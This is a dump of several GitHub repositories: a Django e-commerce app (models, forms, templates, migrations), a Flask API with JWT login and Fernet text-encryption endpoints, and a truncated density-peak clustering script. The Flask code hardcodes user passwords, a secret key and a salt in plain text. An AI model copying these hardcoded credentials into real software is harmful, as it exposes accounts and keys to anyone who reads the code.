"max_line_length": 78,
"num_lines": 38,
"path": "/mahedi/shop/migrations/0010_auto_20201215_1247.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-15 06:47\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0009_projectsetting_title_icon'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectsetting',\n name='team1',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team2',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team3',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team4',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team5',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.3894711136817932,
"alphanum_fraction": 0.4094564914703369,
"avg_line_length": 28.7391300201416,
"blob_id": "4624d9ae8de03ae4bc98e2bcae26d3d02ebf8ce0",
"content_id": "233daa622e602cb0efac4fc88d5081583aaf37ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 4104,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 138,
"path": "/mahedi/shop/templates/shop/user_register.html",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "{% extends 'shop/basic.html' %}\n\n{% block title%} About Us{% endblock %}\n{% block body %}\n\n\n\n{% load static %}\n{% load crispy_forms_tags %}\n\n\n\n<div class=\"breadcrumb-area\">\n <div class=\"container\">\n <div class=\"breadcrumb-content\">\n <ul>\n \n <li class=\"active\">Register</li>\n </ul>\n </div>\n <div>\n {%if messages %} {% for message in messages %}\n <div class=\"alert alert-{{ message.tags }}\" role=\"alert\">\n {{message}}\n </div>\n {% endfor %} {% endif %}\n </div>\n </div>\n</div>\n<!-- Li's Breadcrumb Area End Here -->\n<!-- Begin Login Content Area -->\n<div class=\"page-section mb-60\">\n <div class=\"container\">\n <div class=\"row\">\n \n <div class=\"col-sm-12 col-md-12 col-lg-6 col-xs-12\">\n <form method=\"post\">\n {% csrf_token %}\n <div class=\"login-form\">\n <h4 class=\"login-title\">Register</h4>\n <div class=\"row\">\n <div class=\"col-md-12 mb-20\">\n {{ form.username|as_crispy_field }}\n </div>\n <div class=\"col-md-6 col-12 mb-20\">\n {{ form.first_name|as_crispy_field }}\n </div>\n <div class=\"col-md-6 col-12 mb-20\">\n {{ form.last_name|as_crispy_field }}\n </div>\n <div class=\"col-md-12 mb-20\">\n {{ form.email|as_crispy_field }}\n </div>\n \n <div class=\"col-md-6 mb-20\">\n {{ form.password1|as_crispy_field }}\n </div>\n <div class=\"col-md-6 mb-20\">\n {{ form.password2|as_crispy_field }}\n </div>\n \n <div class=\"col-12\">\n <button class=\"register-button mt-0\">Register</button>\n </div>\n </div>\n </div>\n </form>\n </div>\n </div>\n </div>\n</div>\n\n\n\n<footer class=\"page-footer font-small cyan darken-3\" style=\" background-color: #000000!important;\">\n \n <!-- Footer Elements -->\n <div class=\"container\">\n\n <!-- Grid row-->\n <div class=\"row\">\n\n <!-- Grid column -->\n <div class=\"col-md-12 py-5\">\n <div class=\"mb-5 flex-center\">\n\n <!-- Facebook -->\n <a class=\"fb-ic text-light\">\n <i class=\"fab fa-facebook-f fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!-- Twitter -->\n <a class=\"tw-ic text-light\">\n <i class=\"fab fa-twitter fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!-- Google +-->\n <a class=\"gplus-ic text-light\">\n <i class=\"fab fa-google-plus-g fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!--Linkedin -->\n <a class=\"li-ic text-light\">\n <i class=\"fab fa-linkedin-in fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!--Instagram-->\n <a class=\"ins-ic text-light\">\n <i class=\"fab fa-instagram fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n \n <a class=\"navbar-brand\" href=\"#!\">\n <img src=\"{{setting.icon.url}}\" height=\"70\" width=\"250\" alt=\"mdb logo\">\n </a>\n </div>\n\n </div>\n <!-- Grid column -->\n\n </div>\n\n <!-- Grid row-->\n\n\n </div>\n <hr class=\"w-100 mt-2 \" style=\"background-color: #ffbf00!important;\">\n <!-- Footer Elements -->\n\n <!-- Copyright -->\n <div class=\"footer-copyright text-center py-3 text-light\">© 2020 Copyright:\n <a href=\"\" class=\" text-muted\"> [email protected]</a>\n </div>\n <!-- Copyright -->\n\n</footer>\n\n\n\n\n\n\n{% endblock %}"
},
{
"alpha_fraction": 0.6840909123420715,
"alphanum_fraction": 0.706818163394928,
"avg_line_length": 30.428571701049805,
"blob_id": "acf92a5887ce20554e3a524f50938d2d4644f231",
"content_id": "94be81ce902a2dded8e9d11b56c32b3e9f842da7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 14,
"path": "/mahedi/blog/models.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\n# Create your models here.\nclass Blogpost(models.Model):\n post_id=models.AutoField(primary_key=True)\n title=models.CharField(max_length=200)\n author=models.CharField(max_length=500,default=\"\")\n blog=models.CharField(max_length=9000,default=\"\")\n pub_date=models.DateField()\n thumbnail = models.ImageField(upload_to='shop/images', default=\"\")\n\n def __str__(self):\n return self.title\n"
},
{
"alpha_fraction": 0.7108238935470581,
"alphanum_fraction": 0.7156704068183899,
"avg_line_length": 25.95652198791504,
"blob_id": "00eee53e05f66989de60d1be070ffaaa4e08980e",
"content_id": "00215869de0fee75a8d687c9e6e824a5cf403532",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 23,
"path": "/mahedi/blog/views.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Blogpost\nfrom shop.models import ProjectSetting\n# Create your views here.\nfrom django.http import HttpResponse\n\ndef index(request):\n myposts = Blogpost.objects.all()\n setting = ProjectSetting.objects.get(id=1)\n params={\n 'myposts':myposts,\n 'setting':setting,\n }\n return render(request, 'blog/index.html',params)\n\ndef blogpost(request, id):\n\tpost = Blogpost.objects.filter(post_id = id)[0]\n\tsetting = ProjectSetting.objects.get(id=1)\n\tparams={\n 'post':post,\n 'setting':setting,\n }\n\treturn render(request, 'blog/blogpost.html',params)"
},
{
"alpha_fraction": 0.6193330883979797,
"alphanum_fraction": 0.6242038011550903,
"avg_line_length": 37.128570556640625,
"blob_id": "eb6f56b06a91c3ac5a2ed61cea2fbb8321f6167f",
"content_id": "3558b9f135f5825cdc47c5e9014a5762b8c57dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2669,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 70,
"path": "/mahedi/shop/forms.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm,UserChangeForm\nfrom django.forms import ModelForm, TextInput, NumberInput, EmailInput, PasswordInput, Select, FileInput\nfrom .models import UserProfile\nfrom django.forms import ModelForm\n\n\n\nclass SignupForm(UserCreationForm):\n username=forms.CharField(max_length=50, label=\"username\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your username\",}\n ))\n email=forms.EmailField(max_length=200, label=\"email\",widget=forms.EmailInput(\n attrs={'placeholder':\"Write your email\",}\n ))\n first_name=forms.CharField(max_length=30, label=\"first name\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your first name\",}\n ))\n last_name=forms.CharField(max_length=30, label=\"last name\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your last name\",}\n ))\n \n \n \n class Meta:\n model=User\n fields=['username','email','first_name','last_name','password1','password2',]\n widgets={\n 'password1':forms.PasswordInput(attrs={'class':'form-control','placeholder':'Enter a new Password'}),\n 'password2':forms.PasswordInput(attrs={'class':'form-control','placeholder':'Confirm your Password'}),\n \n\n }\n\n\nclass UserUpdateForm(UserChangeForm):\n class Meta:\n model=User\n fields=('username','email','first_name','last_name')\n widgets={\n 'username':TextInput(attrs={'class':'input','placeholder':'username'}),\n 'email':EmailInput(attrs={'class':'input','placeholder':'email'}),\n 'first_name':TextInput(attrs={'class':'input','placeholder':'first_name'}),\n 'last_name':TextInput(attrs={'class':'input','placeholder':'last_name'}),\n }\n\n\nCITY = [\n ('Dhaka', 'Dhaka'),\n ('Mymensign', 'Mymensign'),\n ('Rajshahi', 'Rajshahi'),\n ('Rangpur', 'Rangpur'),\n ('Barisal', 'Barisal'),\n ('Chottogram', 'Chottogram'),\n ('Khulna', 'Khulna'),\n]\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('phone', 'address', 'city', 'country', 'image')\n widgets = {\n 'phone': TextInput(attrs={'class': 'input', 'placeholder': 'phone'}),\n 'address': TextInput(attrs={'class': 'input', 'placeholder': 'address'}),\n 'city': Select(attrs={'class': 'input', 'placeholder': 'city'}, choices=CITY),\n 'country': TextInput(attrs={'class': 'input', 'placeholder': 'country'}),\n 'image': FileInput(attrs={'class': 'input', 'placeholder': 'image', }),\n }\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 32,
"blob_id": "d9747d86c40114dbe2d4522604e4fb36e5c34ceb",
"content_id": "f26aa7ece5cbbf53e99022350515a3ae75c1f9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 14,
"path": "/mahedi/shop/admin.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Product, Contact, Order, OrderUpdate,ProjectSetting,UserProfile\nadmin.site.register(Product)\nadmin.site.register(Contact)\nadmin.site.register(Order)\nadmin.site.register(OrderUpdate)\nadmin.site.register(ProjectSetting)\nclass UserProfileAdmin(admin.ModelAdmin):\n\tlist_display=['user','country','image_tag']\n\tlist_filter=['user',]\n\nadmin.site.register(UserProfile,UserProfileAdmin)\n"
},
{
"alpha_fraction": 0.6710615754127502,
"alphanum_fraction": 0.6944760084152222,
"avg_line_length": 34.39516067504883,
"blob_id": "67cd47bc7bc65794a6652b1706049ba9e22c7fa1",
"content_id": "849e2ddf1409a1d2636dd055d74537daa6015cbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4399,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 124,
"path": "/mahedi/shop/models.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\n\n# Create your models here.\nclass ProjectSetting(models.Model):\n STATUS = (\n ('True', 'True'),\n ('False', 'False'),)\n \n title =models.CharField(max_length=200)\n keyword=models.CharField(max_length=200)\n description=models.TextField()\n address=models.CharField(max_length=200)\n phone=models.CharField(max_length=18)\n fax=models.CharField(blank=True,max_length=50)\n email=models.EmailField(blank=True,null=True,max_length=100)\n smptserver=models.CharField(max_length=100)\n smptemail=models.EmailField(blank=True,null=True,max_length=100)\n smptpassword=models.CharField(blank=True,max_length=50)\n smptport=models.CharField(blank=True,max_length=150)\n icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n about_icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n title_icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n facebook=models.CharField(blank=True,max_length=100)\n instagram=models.CharField(blank=True,max_length=100)\n address=models.TextField()\n contact=models.TextField()\n reference=models.TextField()\n status=models.CharField(max_length=50,choices=STATUS)\n created_at=models.DateTimeField(auto_now_add=True)\n updated_at=models.DateTimeField(auto_now_add=True)\n team1=models.ImageField(blank=True,null=True,upload_to='icon/')\n team2=models.ImageField(blank=True,null=True,upload_to='icon/')\n team3=models.ImageField(blank=True,null=True,upload_to='icon/')\n team4=models.ImageField(blank=True,null=True,upload_to='icon/')\n team5=models.ImageField(blank=True,null=True,upload_to='icon/')\n user=models.ImageField(blank=True,null=True,upload_to='icon/')\n\n\n def __str__(self):\n return self.title\n \nclass Product(models.Model):\n product_id = models.AutoField\n product_name = models.CharField(max_length=50)\n category = models.CharField(max_length=50, default=\"\")\n subcategory = models.CharField(max_length=50, default=\"\")\n price = models.IntegerField(default=0)\n desc = models.CharField(max_length=300)\n pub_date = models.DateField()\n image = models.ImageField(upload_to='shop/images', default=\"\")\n\n def __str__(self):\n return self.product_name\n\n\nclass Contact(models.Model):\n msg_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n email = models.CharField(max_length=70, default=\"\")\n phone = models.CharField(max_length=70, default=\"\")\n desc = models.CharField(max_length=500, default=\"\")\n\n\n def __str__(self):\n return self.name\n\nclass Order(models.Model):\n order_id = models.AutoField(primary_key=True)\n items_json = models.CharField(max_length=5000)\n amount = models.IntegerField(default=0)\n name = models.CharField(max_length=90)\n email = models.CharField(max_length=111)\n address = models.CharField(max_length=111)\n city = models.CharField(max_length=111)\n state = models.CharField(max_length=111)\n zip_code = models.CharField(max_length=111)\n phone = models.CharField(max_length=111, default=\"\")\n\n\n def __str__(self):\n return self.name+\"\\'s Product\"\n\n\n\n\n\nclass OrderUpdate(models.Model):\n update_id=models.AutoField(primary_key=True)\n order_id=models.IntegerField(default=\"\")\n update_desc=models.CharField(max_length=5000)\n timesetup=models.DateField(auto_now_add=True)\n\n def __str__(self):\n return self.update_desc[0:7] + \"...\"\n\n\n\n\nclass UserProfile(models.Model):\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n phone=models.CharField(blank=True,max_length=20)\n address=models.CharField(blank=True,max_length=250)\n city=models.CharField(blank=True,max_length=25)\n country=models.CharField(blank=True,max_length=30)\n image=models.ImageField(blank=True,upload_to='user_img')\n\n def __str__(self):\n return self.user.username\n\n\n def user_name(self):\n return self.user.first_name+' '+ self.user.last_name+'['+self.user.username+']'\n\n def image_tag(self):\n return mark_safe('<img src=\"{}\" heights=\"50\" width=\"50\" />'.format(self.image.url))\n image_tag.short_description='Image'\n\n def imageUrl(self):\n if self.image:\n return self.image.url\n else:\n return \"\"\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5085158348083496,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 21.83333396911621,
"blob_id": "46ab59b14653155675f9fc7327f87073f31f774c",
"content_id": "20a3603d4b231344c0b5935ca6e06da4e1844cf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 18,
"path": "/mahedi/blog/migrations/0004_blogpost_types.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-16 06:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0003_auto_20201216_1204'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='blogpost',\n name='types',\n field=models.CharField(default='', editable=False, max_length=200),\n ),\n ]\n"
}
] | 10 |
dunefro/raelvaes | https://github.com/dunefro/raelvaes | ae618d580ae67bd231386294d3f181803759caa5 | 6276818e47e345dceed4dd00eb72b55304920e99 | 2639b4946dce7beb5e832b3baa2941c1d6cc6301 | refs/heads/master | 2023-01-29T23:45:12.129173 | 2020-12-10T16:56:35 | 2020-12-10T16:56:35 | 299,208,332 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7779783606529236,
"alphanum_fraction": 0.7888086438179016,
"avg_line_length": 29.83333396911621,
"blob_id": "76207b9e4751f1e502f3089f258e63b718cecf33",
"content_id": "5bcf975a0de6233cc285ae401360a399110dda74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/flask_app/app/v1/__init__.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask import Flask , request\nfrom flask_restful import Resource, Api , reqparse\nfrom flask_jwt import JWT , jwt_required , current_identity\nimport os\nimport base64\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\n\napp = Flask(__name__)\n# The secret key is to be initialized before the api object is created\napp.secret_key = 'aR4QpGzGgHcY7haxHT9g89Puph3NgvNBBMBMnHEC'\napi = Api(app)\nsalt = b'6o\\x96h`\\xdf\\xf1\\xecL2`\\xcf=\\xf0`\\xcc'\n\nfrom app.v1 import access\nfrom app.v1 import health"
},
{
"alpha_fraction": 0.7392995953559875,
"alphanum_fraction": 0.7548637986183167,
"avg_line_length": 20.5,
"blob_id": "76662058d340de7b566d3f4ec39f7316b5e5ad17",
"content_id": "f2f096ab81b861a51c2767f31687bf722605af5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 12,
"path": "/flask_app/execute.sh",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ -z $VIRTUAL_ENV ]\nthen\n echo \"Activating Python Virtual Environment\"\n source myenv/bin/activate\nfi\nexport FLASK_APP=run.py\nexport FLASK_ENV=development\nexport PYTHONPATH=/home/ubuntu/workspace/raelvaes/flask_app\n\nflask run -h 0.0.0.0"
},
{
"alpha_fraction": 0.715855598449707,
"alphanum_fraction": 0.720565140247345,
"avg_line_length": 78.625,
"blob_id": "1f2f034a1f42b6c1abff1ab9d3d4d140b03a0ced",
"content_id": "9433cb3dc9fe5666b316751f5013857941d7ae8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 8,
"path": "/Roadmap.md",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "- [ ] Deploy a simple application like kafka (ver 0.0.1)\n - [ ] Flask API accepting json input to process for execution\n - [ ] Sample structure of json/yaml\n - [ ] The sample structure should be somewhat similar to docker-compose or kubernetes yaml, apiVersion should refer to the version of api we are using in flask\n - [ ] terminology is based on railways\n - [ ] Depending upon the input a simple algorithm that calculates the resources (AWS) that will be required.\n - [ ] Templatising the algorithm result into terraform and ansible modules\n - [ ] Executing the terraform module and ansible module as well.\n"
},
{
"alpha_fraction": 0.6000881791114807,
"alphanum_fraction": 0.6221340298652649,
"avg_line_length": 33.907691955566406,
"blob_id": "260afce61c3f37860173914c5700157156940303",
"content_id": "aec51ed0ad3ae54ac4669550ffbb10149e22d977",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2268,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 65,
"path": "/flask_app/app/v1/access.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1 import app , api , Resource , JWT , jwt_required , reqparse , request , current_identity , os , base64 , Fernet , hashes , PBKDF2HMAC , salt\nfrom app.v1.security.auth import authenticate , identity\n\njwt = JWT(app , authenticate , identity)\n\nclass Access(Resource):\n\n @staticmethod\n def decrypt_text(text):\n\n password = current_identity.password.encode()\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256() , length=32 , salt=salt , iterations=100000)\n key = base64.urlsafe_b64encode(kdf.derive(password))\n f = Fernet(key)\n return f.decrypt(text.encode()).decode()\n\n @jwt_required() \n def post(self,name):\n \"\"\"This function takes the GET req on /access API. \n Used for accessing the VM/cloud over which the authentication will take place either to connect via SSH or deploy VMs. \n\n Args:\n name ([string]): [kind of authentication. Allowed values are (ssh,aws,gcp,azure,k8s)]\n\n Returns:\n [dictionary]: [Will return successful if the authentication works fine.]\n \"\"\"\n if request.is_json:\n data = request.get_json()\n else:\n return {'Message': 'Request Body type is not json'},400\n decrypted_text = Access.decrypt_text(data['key'])\n print(decrypted_text)\n return decrypted_text,200\n\nclass SecureText(Resource):\n\n @staticmethod\n def encrypt_text(text):\n password = current_identity.password.encode()\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256() , length=32 , salt=salt , iterations=100000)\n key = base64.urlsafe_b64encode(kdf.derive(password))\n f = Fernet(key)\n return f.encrypt(text.encode()).decode()\n\n @jwt_required()\n def get(self,text):\n \"\"\"Function returns the encrypted text.\n\n Args:\n name ([string]): [text that is to be encrypted]\n\n Returns:\n [string]: [The encrypted string/token]\n \"\"\"\n try:\n encrypted_text = SecureText.encrypt_text(text)\n return {'encrypted': encrypted_text},200\n except:\n return {'Message': 'Your text [{}] can\\'t be encrypted'.format(text)} , 500\n\n\n\napi.add_resource(Access,'/access/<string:name>')\napi.add_resource(SecureText,'/securetext/<string:text>')"
},
{
"alpha_fraction": 0.6877265572547913,
"alphanum_fraction": 0.697566032409668,
"avg_line_length": 36.13461685180664,
"blob_id": "32ba4e5c10860815074f2fd3fa20bdda4020af67",
"content_id": "0db305ca5e24efe721fa62011abed2851691aace",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1931,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 52,
"path": "/README.md",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "# raelvaes\n1. Authentication with the API itself -> Correct Username and Password\n2. /access/<string:cloud-provider-name> -> to authenticate with cloud provider AWS, Azure or using SSH/k8s\n3. /execute/platform -> Platform\n4. /execute/station -> \n5. /journey/start\n\n\n# New Implementation\n1. access.yaml hits the flask API and `Access` object is created.\n a. `Access` class receives the complete details and tests the connection (ssh for now).\n b. Creates an object with the same name as of the name in the metadata.\n2. After this `Platform_flask` API gets the `Platform` object\n a. `Platform` class creates an object.\n b. object looks for `Access` information\n c. If `Access` information is present, perform the connection and use ansible module\n d. If `Access` information is not present, pass the `Platform` object to server decider\n e. After server decider pass the information to terraform\n f. Terraform creates the required resources.\n g. Ansible module deploys the required software.\n \n\n\n\n\nNotes :\n1. First an authentication to the API with the username and the password\n2. Securing authentication to the VM, either SSH or AWS or k8s(for now)\n3. Executing platform is preparing a VM for task deployments by creating a new machine from cloud access keys. Nothing is to be done when platform is to be SSHed.\n4. A station can have multiple platforms, platforms are VMs, so station is nothing but a bunch of VM that you wish to pack together in a group.\n5. The journey will begin from start( for e.g. Station 1) till end (for e.g. Station 5).\n\n\n# Mechanism to connect using SSH\n1. Using username and password\n2. Key based \n```\n## 1. Username\n\n POST /access/ssh\n {\n \"type\": \"user-based\"\n \"username\": \"ubuntu\"\n \"password\" : {\n \"type\": \"secure\"\n \"hash\": _________\n }\n \"password\": \"\n }\n ```\n # Architecture\n \n"
},
{
"alpha_fraction": 0.5959596037864685,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 19,
"blob_id": "9b1a07719323a1ab6427c21a170cc4105ab4bfaa",
"content_id": "57906a8f12a5860ac62dc6396a57559dbb44582c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 5,
"path": "/flask_app/app/v1/health.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1 import app \n\[email protected]('/healthz')\ndef health():\n return 'Up and Running !!!' , 200"
},
{
"alpha_fraction": 0.672583818435669,
"alphanum_fraction": 0.6844181418418884,
"avg_line_length": 25.736841201782227,
"blob_id": "e367e0df9203fb34d4cb141816e00f1d1947cbba",
"content_id": "33430063c96ed8e9f29d7714316b88e48f48b939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 507,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/flask_app/app/v1/security/auth.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1.security.user import User\nusers = [\n User(1,'admin','LsadR3syRYtwVHH'),\n User(2,'developer','hAhGYeN4Ysz6wZC')\n]\n\nusername_mapping = { user.username: user for user in users }\nuserid_mapping = { user.id: user for user in users }\n\ndef authenticate( username , password ):\n\n user = username_mapping.get( username , None)\n if user and user.password == password:\n return user\n\ndef identity(payload):\n\n user_id = payload['identity']\n return userid_mapping.get( user_id , None)"
}
] | 7 |
yiwangchunyu/AdvancedCDP | https://github.com/yiwangchunyu/AdvancedCDP | 412c417134799eed6fb6119fead9209c525d7f46 | 0197c002755b384a402a1cf002eecded4f05e5ba | 088bb68dd3c1385dafc94a308965a890e4829bf6 | refs/heads/master | 2021-04-17T22:54:40.679439 | 2020-05-14T16:04:21 | 2020-05-14T16:04:21 | 249,482,720 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5288001894950867,
"alphanum_fraction": 0.5464911460876465,
"avg_line_length": 33.272987365722656,
"blob_id": "05c0f97ffacc6f3ca0d2e0454f2191c3fe589314",
"content_id": "bb2283eccaab94b846eef6e3598243a340a58665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12027,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 348,
"path": "/AdvancedCDP.py",
"repo_name": "yiwangchunyu/AdvancedCDP",
"src_encoding": "UTF-8",
"text": "import heapq\nimport time\nfrom math import exp\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom typing import List\n\nfrom tqdm import tqdm\n\nEPS=40 #邻域半径\nP=2\n\nMAX_DELTA=1e10\nDISPLAY_SCATTER_SIZE=150\nDIS_INF=1e10\n\nclass Point():\n\n def __init__(self,id,x):\n self.id=id\n self.x=x\n self.label_real=-1\n self.label=-1\n self.cost = DIS_INF # 距离源S的距离\n self.edge_all = {} # 边的情况\n self.edge_eps = {} # 边的情况\n self.density = 0\n self.delta = MAX_DELTA\n self.gamma = None\n self.pre=None\n self.pre_size=0\n self.cost_sum=0\n\n\n def comput_euclidean_dis_with(self,point_y):\n norm_2 = np.linalg.norm(np.array(self.x) - np.array(point_y.x), ord=2)\n return norm_2\n\n def __lt__(self, other):\n return self.cost < other.cost\n\n\ndef scatter2D(pts,title=''):\n x=[p.x[0] for p in pts]\n y=[p.x[1] for p in pts]\n labels=[p.label for p in pts]\n plt.title(title)\n plt.scatter(x, y, s=10, c=labels, marker='o')\n plt.savefig('scatter2D.png', dpi=500)\n plt.show()\n\n\ndef dataset(data_file, label_file, display:bool=True):\n id2point={}\n pts=[]\n dataf=open(data_file,'r')\n labelf = open(label_file, 'r')\n for line in dataf:\n if line[:2]=='//':\n continue\n id=line.split('\\t')[0]\n pos=tuple(map(float,line.split('\\t')[1:]))\n point=Point(id,pos)\n pts.append(point)\n id2point[id]=point\n\n for line in labelf:\n if line[:2]=='//':\n continue\n id = line.split('\\t')[0]\n label=int(line.split('\\t')[-1])\n id2point[id].label_real=label\n\n if display:\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label_real for p in pts]\n plt.title('')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.axis('scaled')\n plt.savefig('scatter2D.png', dpi=500)\n plt.show()\n return id2point,pts\n\ndef find_edge(pts:List[Point]):\n print('find edge...')\n for point in tqdm(pts):\n for neighbor_point in pts:\n if point.id==neighbor_point.id:\n continue\n dis=point.comput_euclidean_dis_with(neighbor_point)\n point.edge_all[neighbor_point.id]=dis\n if dis<EPS:\n point.edge_eps[neighbor_point.id]=dis\n\ndef decision_graph(pts:List[Point], display:bool=True) -> List[Point]:\n #计算每个点的密度\n print('computing density...')\n for point in tqdm(pts):\n for id in point.edge_eps:\n point.density+=exp(-(point.edge_eps[id]/EPS)**2)\n #按密度从高到低排序\n pts.sort(key=lambda p:p.density,reverse=True)\n #计算delta\n max_density=pts[0].density\n print('computing delta...')\n for id,point in tqdm(enumerate(pts)):\n if point.density==max_density:\n point.delta = -MAX_DELTA\n for point_neighbor in pts:\n if point.id==point_neighbor.id:\n continue\n dis = point.edge_all[point_neighbor.id]\n point.delta=max(point.delta,dis)\n else:\n for point_neighbor in pts[:id]:\n if point_neighbor.density>point.density:\n dis = point.edge_all[point_neighbor.id]\n point.delta=min(point.delta,dis)\n #delta归一化(max_min nomalization)\n print('nomalization...')\n max_delta=-MAX_DELTA\n min_delta=MAX_DELTA\n for point in pts:\n max_delta=max(max_delta,point.delta)\n min_delta = min(min_delta, point.delta)\n for point in pts:\n point.delta=(point.delta-min_delta)/(max_delta-min_delta)\n\n if display:\n dens = [p.density for p in pts]\n deltas = [p.delta for p in pts]\n plt.title('decision graph')\n plt.xlabel('density')\n plt.ylabel('delta')\n plt.scatter(dens, deltas, s=20, marker='o')\n plt.show()\n return pts\n\ndef find_albow(pts:List[Point], display:bool=True):\n for point in pts:\n point.gamma=point.delta*point.density\n #排序\n pts_sorted_by_gamma=sorted(pts, key=lambda 